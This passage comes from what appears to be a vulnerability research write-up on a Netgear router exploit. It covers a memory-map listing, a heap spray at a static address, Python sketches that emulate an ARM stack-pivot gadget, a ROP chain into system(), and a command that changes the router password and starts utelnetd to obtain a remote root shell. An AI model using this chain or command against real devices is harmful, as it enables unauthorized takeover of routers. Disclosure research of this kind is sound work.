4015f000-40166000 ---p 00000000 00:00 0
40166000-40167000 r--p 0000a000 1f:03 265 /lib/libpthread.so.0
40167000-4016c000 rw-p 0000b000 1f:03 265 /lib/libpthread.so.0
4016c000-4016e000 rw-p 00000000 00:00 0
4016e000-401d3000 r-xp 00000000 1f:03 352 /lib/libc.so.0 // ASLR
401d3000-401db000 ---p 00000000 00:00 0
401db000-401dc000 r--p 00065000 1f:03 352 /lib/libc.so.0
401dc000-401dd000 rw-p 00066000 1f:03 352 /lib/libc.so.0
401dd000-401e2000 rw-p 00000000 00:00 0 // Broken ASLR
bcdfd000-bce00000 rwxp 00000000 00:00 0
bcffd000-bd000000 rwxp 00000000 00:00 0
bd1fd000-bd200000 rwxp 00000000 00:00 0
bd3fd000-bd400000 rwxp 00000000 00:00 0
bd5fd000-bd600000 rwxp 00000000 00:00 0
bd7fd000-bd800000 rwxp 00000000 00:00 0
bd9fd000-bda00000 rwxp 00000000 00:00 0
bdbfd000-bdc00000 rwxp 00000000 00:00 0
bddfd000-bde00000 rwxp 00000000 00:00 0
bdffd000-be000000 rwxp 00000000 00:00 0
be1fd000-be200000 rwxp 00000000 00:00 0
be3fd000-be400000 rwxp 00000000 00:00 0
beacc000-beaed000 rw-p 00000000 00:00 0 [stack] // ASLR
If it gets allocated at the lowest address 0x40100008, it will end at 0x41100008. It means we can spray pages of the same data and get deterministic content at a static address, e.g. 0x41000100.
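The reasoning can be checked with a little arithmetic. The sketch below assumes that the buffer always starts 8 bytes into a page, as in the 0x40100008 example, and that the sprayed content repeats with a period of one 4 KB page; both are assumptions for illustration, and the function names are hypothetical.

```python
ALLOC_SIZE = 0x1000000   # 16 MB of HTTP content, as in the text
TARGET = 0x41000100      # static address chosen in the text
PAGE = 0x1000            # assumed period of the sprayed pattern


def covers_target(start: int) -> bool:
    """True if a buffer starting at `start` contains TARGET."""
    return start <= TARGET < start + ALLOC_SIZE


def offset_in_pattern(start: int) -> int:
    """Index into the repeating PAGE-sized pattern that lands on TARGET."""
    return (TARGET - start) % PAGE
```

Under those assumptions, every start address from 0x40100008 up to 0x403ff008 covers 0x41000100, and the byte at that address is always byte 0xF8 of the repeated page, whichever start address was picked.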
Finally, looking at the Response_Get_Jobs function’s epilogue, we see POP {R11,PC}, which means we can craft a fake R11 and use a gadget like the following to pivot our stack to a new stack where we have data we control to start doing Return Oriented Programming (ROP):
.text:000118A0 LDR R3, [R11,#-0x28]
.text:000118A4
.text:000118A4 loc_118A4 ; Get_JobNode_Print_Job+7D8↑j
.text:000118A4 MOV R0, R3
.text:000118A8 SUB SP, R11, #4
.text:000118AC POP {R11,PC}
So we can make R11 point to our static region at 0x41000100 and also store the command to execute at a static address in that region. Then we use the above gadget to load the address of that command (also stored in that region) into r0, the first argument of system(), and then pivot the stack into that region so that it finally returns to system("any command").
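The effect of the gadget on the registers can be traced with a small emulation. This is a sketch for reasoning about the fake frame only: memory is modelled as a dictionary of 32-bit words keyed by address, build_fake_frame and run_pivot_gadget are hypothetical names, and the command and system() addresses in the usage note are placeholders.

```python
def build_fake_frame(fake_r11: int, command_addr: int, target_pc: int) -> dict:
    """Lay out the three 32-bit words the gadget reads, keyed by address."""
    return {
        fake_r11 - 0x28: command_addr,  # loaded into R3, then moved to R0
        fake_r11 - 4: 0,                # popped into R11 (value not important here)
        fake_r11: target_pc,            # popped into PC
    }


def run_pivot_gadget(memory: dict, r11: int) -> dict:
    """Emulate: LDR R3,[R11,#-0x28]; MOV R0,R3; SUB SP,R11,#4; POP {R11,PC}."""
    r3 = memory[r11 - 0x28]
    r0 = r3
    sp = r11 - 4
    new_r11 = memory[sp]        # POP loads the lowest-numbered register first
    pc = memory[sp + 4]
    sp += 8
    return {"r0": r0, "r11": new_r11, "pc": pc, "sp": sp}
```

Running the emulation with a fake R11 of 0x41000100 shows r0 holding the command address and pc holding the chosen target, which is exactly the state needed for the return into system().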
Obtaining a root shell
We decided to use the following command: "nvram set http_passwd=nccgroup && sleep 4 && utelnetd -d -i br0".
This is very similar to the method used in the Tokyo Drift paper, except that in our case we have more control: since we can execute any command we want, we can set an arbitrary password and start the utelnetd process, instead of just being able to reset the HTTP password to its default value.
Finally, we use the same trick as the Tokyo Drift paper and log in to the web interface to set the password again to the same value, so that utelnetd takes our new password into account and we get a remote shell on the Netgear router.